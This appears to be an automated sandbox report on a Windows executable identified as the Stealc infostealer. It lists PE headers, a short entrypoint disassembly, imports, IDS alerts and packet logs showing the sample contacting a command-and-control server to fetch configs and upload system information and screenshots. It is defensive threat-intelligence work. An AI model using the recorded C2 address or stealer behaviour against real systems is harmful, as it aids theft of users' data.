File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	6b2cdba4dbc5bc02ad6c1c23a6105d09

Entrypoint Preview

Instruction
call 00007F9A786F9146h
jmp 00007F9A786F45EDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0048C4B0h], eax
mov dword ptr [0048C4ACh], ecx
mov dword ptr [0048C4A8h], edx
mov dword ptr [0048C4A4h], ebx
mov dword ptr [0048C4A0h], esi
mov dword ptr [0048C49Ch], edi
mov word ptr [0048C4C8h], ss
mov word ptr [0048C4BCh], cs
mov word ptr [0048C498h], ds
mov word ptr [0048C494h], es
mov word ptr [0048C490h], fs
mov word ptr [0048C48Ch], gs
pushfd
pop dword ptr [0048C4C0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0048C4B4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0048C4B8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0048C4C4h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0048C400h], 00010001h
mov eax, dword ptr [0048C4B8h]
mov dword ptr [0048C3B4h], eax
mov dword ptr [0048C3A8h], C0000409h
mov dword ptr [0048C3ACh], 00000001h
mov eax, dword ptr [0048B008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0048B00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000D0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8988c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2791000	0x1cef0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x88000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x86060	0x86200	a60330e4f44773a80034e73c19d3ab1c	False	0.9157808131407269	data	7.792888233688181	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x88000	0x218c	0x2200	055e471c3024b0d56c1631e53bd3f87d	False	0.3668428308823529	data	5.586436308020466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8b000	0x2705064	0x4800	a7be29c4c3152bbaf6aa97ac00d46587	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2791000	0x1cef0	0x1d000	bb914251fa596c467f5ba15e06f39dad	False	0.3724659886853448	DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 42535295865117307932921825928971026432.000000	4.560071088617953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2791a60	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.32489339019189767
RT_ICON	0x2792908	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5004512635379061
RT_ICON	0x27931b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5368663594470046
RT_ICON	0x2793878	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.5729768786127167
RT_ICON	0x2793de0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.4225103734439834
RT_ICON	0x2796388	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4979508196721312
RT_ICON	0x2796d10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.49822695035460995
RT_ICON	0x27971e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.3347547974413646
RT_ICON	0x2798088	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.3944043321299639
RT_ICON	0x2798930	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.39919354838709675
RT_ICON	0x2798ff8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.4046242774566474
RT_ICON	0x2799560	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.2216804979253112
RT_ICON	0x279bb08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.25164165103189495
RT_ICON	0x279cbb0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.28237704918032785
RT_ICON	0x279d538	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.3191489361702128
RT_ICON	0x279da18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3829957356076759
RT_ICON	0x279e8c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5306859205776173
RT_ICON	0x279f168	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6002304147465438
RT_ICON	0x279f830	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6293352601156069
RT_ICON	0x279fd98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.3907129455909944
RT_ICON	0x27a0e40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.3844262295081967
RT_ICON	0x27a17c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.42730496453900707
RT_ICON	0x27a1c98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.27798507462686567
RT_ICON	0x27a2b40	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.3637184115523466
RT_ICON	0x27a33e8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.37672811059907835
RT_ICON	0x27a3ab0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3764450867052023
RT_ICON	0x27a4018	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.25923236514522824
RT_ICON	0x27a65c0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.2781425891181989
RT_ICON	0x27a7668	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.2889344262295082
RT_ICON	0x27a7ff0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32269503546099293
RT_DIALOG	0x27a8698	0x84	data			0.7651515151515151
RT_STRING	0x27a8720	0x59c	data			0.4352367688022284
RT_STRING	0x27a8cc0	0x566	data			0.4399421128798842
RT_STRING	0x27a9228	0x2e0	data			0.48233695652173914
RT_STRING	0x27a9508	0x672	data			0.43575757575757573
RT_STRING	0x27a9b80	0x758	data			0.42446808510638295
RT_STRING	0x27aa2d8	0x734	data			0.42462039045553146
RT_STRING	0x27aaa10	0x5a2	data			0.4459084604715673
RT_STRING	0x27aafb8	0x682	data			0.4309723889555822
RT_STRING	0x27ab640	0x618	data			0.43205128205128207
RT_STRING	0x27abc58	0x662	data			0.4412484700122399
RT_STRING	0x27ac2c0	0x7b2	data			0.4147208121827411
RT_STRING	0x27aca78	0x6ac	data			0.43676814988290397
RT_STRING	0x27ad128	0x78e	data			0.41985522233712513
RT_STRING	0x27ad8b8	0x5fa	data			0.43529411764705883
RT_STRING	0x27adeb8	0x36	data			0.6111111111111112
RT_ACCELERATOR	0x27a84d0	0x28	data			1.025
RT_GROUP_ICON	0x2797178	0x68	data	Turkish	Turkey	0.7115384615384616
RT_GROUP_ICON	0x27a8458	0x76	data	Turkish	Turkey	0.6779661016949152
RT_GROUP_ICON	0x27a1c30	0x68	data	Turkish	Turkey	0.7211538461538461
RT_GROUP_ICON	0x279d9a0	0x76	data	Turkish	Turkey	0.6779661016949152
RT_VERSION	0x27a84f8	0x1a0	data			0.5841346153846154

Imports

DLL

Import

KERNEL32.dll

SetProcessAffinityMask, GetNumaNodeProcessorMask, GetLocaleInfoA, MoveFileExA, WriteConsoleOutputCharacterA, HeapAlloc, SetDefaultCommConfigW, GetSystemWindowsDirectoryW, GlobalLock, InterlockedCompareExchange, SetCommBreak, GetModuleHandleW, GetTickCount, GlobalAlloc, LoadLibraryW, GetConsoleAliasExesLengthW, GetStringTypeExW, GetTimeFormatW, GetConsoleAliasW, SetConsoleCursorPosition, WriteConsoleW, GetModuleFileNameW, GetConsoleFontSize, GetACP, GetStartupInfoW, DisconnectNamedPipe, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetProcAddress, VirtualAlloc, SetFileAttributesA, BuildCommDCBW, OpenWaitableTimerA, UnhandledExceptionFilter, MoveFileA, GlobalHandle, GetModuleFileNameA, OpenFileMappingW, FreeEnvironmentStringsW, GetShortPathNameW, FindAtomW, MultiByteToWideChar, GetLastError, HeapReAlloc, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, HeapSize, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, HeapFree, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, RtlUnwind, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, SetStdHandle, CreateFileA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-09T02:47:08.860469+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49699	77.220.212.32	80	TCP
2024-11-09T02:47:09.103046+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.7	49699	77.220.212.32	80	TCP
2024-11-09T02:47:09.228618+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	77.220.212.32	80	192.168.2.7	49699	TCP
2024-11-09T02:47:09.464728+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.7	49699	77.220.212.32	80	TCP
2024-11-09T02:47:09.471345+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	77.220.212.32	80	192.168.2.7	49699	TCP
2024-11-09T02:47:10.383865+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.7	49699	77.220.212.32	80	TCP
2024-11-09T02:47:10.851417+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49699	77.220.212.32	80	TCP
2024-11-09T02:47:23.666031+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.7	49754	TCP
2024-11-09T02:47:33.541353+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:34.544732+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:35.204399+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:35.625979+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:36.827114+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:37.251165+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:40.150338+0100	2044249	ET MALWARE Win32/Stealc Submitting Screenshot to C2	1	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:56.883045+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.7	27888	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2024 02:47:00.585556030 CET	443	49698	104.98.116.138	192.168.2.7
Nov 9, 2024 02:47:00.585756063 CET	49698	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:01.290406942 CET	49674	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:01.290431023 CET	49675	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:01.431066990 CET	49672	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:07.527019978 CET	49677	443	192.168.2.7	20.50.201.200
Nov 9, 2024 02:47:07.696048021 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:07.700933933 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:07.701060057 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:07.701685905 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:07.706444025 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:07.899812937 CET	49677	443	192.168.2.7	20.50.201.200
Nov 9, 2024 02:47:08.532464027 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:08.532641888 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:08.535507917 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:08.540302038 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:08.649876118 CET	49677	443	192.168.2.7	20.50.201.200
Nov 9, 2024 02:47:08.860290051 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:08.860469103 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:08.862277985 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:08.867989063 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.102893114 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.102937937 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.103045940 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.223802090 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.228617907 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.464664936 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.464678049 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.464689970 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.464728117 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.464764118 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.464812040 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.464824915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.464839935 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.464853048 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.464863062 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.464888096 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.466551065 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.471344948 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.706866980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.707063913 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.728300095 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.728378057 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:09.733237982 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.733247995 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.733257055 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.733268023 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.733303070 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.733354092 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:09.733364105 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.149801970 CET	49677	443	192.168.2.7	20.50.201.200
Nov 9, 2024 02:47:10.383800030 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.383865118 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.614357948 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.619215965 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851300955 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851327896 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851344109 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851417065 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.851471901 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851484060 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851495028 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851511955 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851524115 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.851525068 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.851536989 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.851567984 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.852371931 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.852384090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.852392912 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.852425098 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.852436066 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.852689028 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.852708101 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.852719069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.852731943 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.852750063 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.852756977 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.899820089 CET	49675	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:10.899827003 CET	49674	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:10.971213102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971225977 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971236944 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971292019 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.971323967 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.971343994 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971427917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971438885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971451044 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971463919 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971474886 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.971477032 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.971503973 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.971515894 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.972291946 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.972337961 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.972341061 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.972349882 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.972394943 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.972421885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.972434044 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.972445011 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.972470999 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.972481012 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.973267078 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.973310947 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.973316908 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.973323107 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.973340034 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.973346949 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.973352909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.973364115 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.973366022 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.973371983 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.973392010 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.973397970 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.974229097 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.974241018 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.974252939 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.974263906 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:10.974277973 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:10.974306107 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.040482998 CET	49672	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:11.091161966 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091245890 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.091249943 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091259003 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091269970 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091280937 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091310024 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091325998 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091336966 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091347933 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091358900 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.091448069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.091448069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.091448069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.091448069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.091448069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.091448069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.091448069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.091996908 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092024088 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092034101 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092044115 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092047930 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.092063904 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.092078924 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.092099905 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.092413902 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092426062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092436075 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092448950 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092461109 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092467070 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.092473030 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.092494965 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.092508078 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.093089104 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.093099117 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.093110085 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.093130112 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.093136072 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.093142033 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.093153000 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.093164921 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.093172073 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.093175888 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.093199968 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.093225002 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.093998909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094011068 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094021082 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094055891 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.094058990 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094068050 CET	49699	80	192.168.2.7	77.220.212.32
